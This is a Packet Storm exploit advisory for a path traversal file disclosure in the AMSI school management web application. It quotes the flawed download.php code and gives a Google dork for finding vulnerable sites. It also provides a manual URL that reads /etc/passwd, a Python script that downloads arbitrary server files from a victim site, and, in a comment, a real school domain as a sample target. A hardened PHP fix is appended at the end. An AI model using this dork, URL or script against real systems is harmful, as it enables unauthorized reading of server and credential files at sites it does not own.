AMSI 3.20.47 Build 37 File Disclosure

2014-12-23T00:00:00
ID PACKETSTORM:129714
Type packetstorm
Reporter KnocKout
Modified 2014-12-23T00:00:00

Description

                                        
`
AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockout@e-mail.com.tr  
[~] Exploit Developed by : B3mB4m  
[~] HomePage : http://h4x0resec.blogspot.com  
[~] Beautiful People : ZoRLu, ( milw00rm.com ),   
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,   
DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs  
###########################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : AMSI ( Academia management solutions international )  
|~Affected Version : v3.20.47 build 37  
|~Software : http://amsi.ae - http://iconnect.ae  
|~RISK : Medium  
|~Google Keyword/Dork : inurl:"?load=news/search_news"  
|~Tested On : [L] Kali Linux \ [R] example sites  
####################INFO################################  
The flaw makes it possible to read any file on the server's local filesystem that the web server process can read.  
#######################################################  
  
### Error Line in 'download.php' ##   
  
..  
$path = str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']);   
// $path = $_GET['file'];   
header("Content-Description: File Transfer");  
header("Content-Type: application/force-download");  
//header("Content-Disposition: attachment; filename=" . basename($path . $uri[1]));  
header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" );  
  
@readfile($path);  
..  
########################################################  
Example and tested on;  
  
  
############################################################  
Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd  
############################################################  
=========Automatic File Source Downloader Exploit ========  
##################### exploit.py ##############################  
  
# Coded by b3mb4m   
  
import random  
import os  
import urllib  
  
class B3mB4m(object):
    def example(self):
        print """

How to use ?
Website: http://VICTIM.com
Path : /download.php?file=../../../../etc/passwd
"""

    def exploit(self):
        ask = raw_input("Website :")
        uz = raw_input("Path : ")

        #ask = "http://alnashaa.sch.ae"
        #uz = "/download.php?file=../../../../etc/passwd"

        uniq = str(random.randrange(1,1000+1))+".txt"
        filee = ask+uz

        try:
            urllib.urlretrieve(filee, uniq);
            print "\t\nDownload complete ! "
            os.startfile(uniq)
        except:
            B3mB4m().example()


if __name__ == '__main__':
    B3mB4m().exploit()
  
  
`
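
A hardened counterpart to the download.php lines quoted above, as an added example (not the vendor's code and not part of the original advisory): it reads the name from the parsed query string, canonicalizes it with realpath(), and serves the file only if it lies inside a single download directory. DOWNLOAD_ROOT and resolve_download() are names assumed for illustration.

```php
<?php
// Added example: hardened download handler. DOWNLOAD_ROOT is an assumed
// location; point it at the one directory that holds downloadable files.
const DOWNLOAD_ROOT = '/var/www/portal/files';

// Map a client-supplied name to a real file inside $root, or return null.
function resolve_download(string $root, string $requested): ?string
{
    $base = realpath($root);
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks, and fails on missing paths.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment check on the canonical path; the trailing separator stops
    // a sibling such as "/var/www/portal/files-old" from matching the prefix.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Take the parameter from the parsed query string, not from REQUEST_URI.
$requested = $_GET['file'] ?? '';
$real = is_string($requested) ? resolve_download(DOWNLOAD_ROOT, $requested) : null;

if ($real === null) {
    // Same response for "missing" and "outside the root": no path oracle.
    http_response_code(404);
    exit;
}

// Restrict the advertised filename to a conservative character set.
$name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($real));

header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($real));
header('X-Content-Type-Options: nosniff');
readfile($real);
```

The check runs on the canonical path that realpath() returns, so `..` segments and symlinks that lead out of the directory are rejected before readfile() is reached.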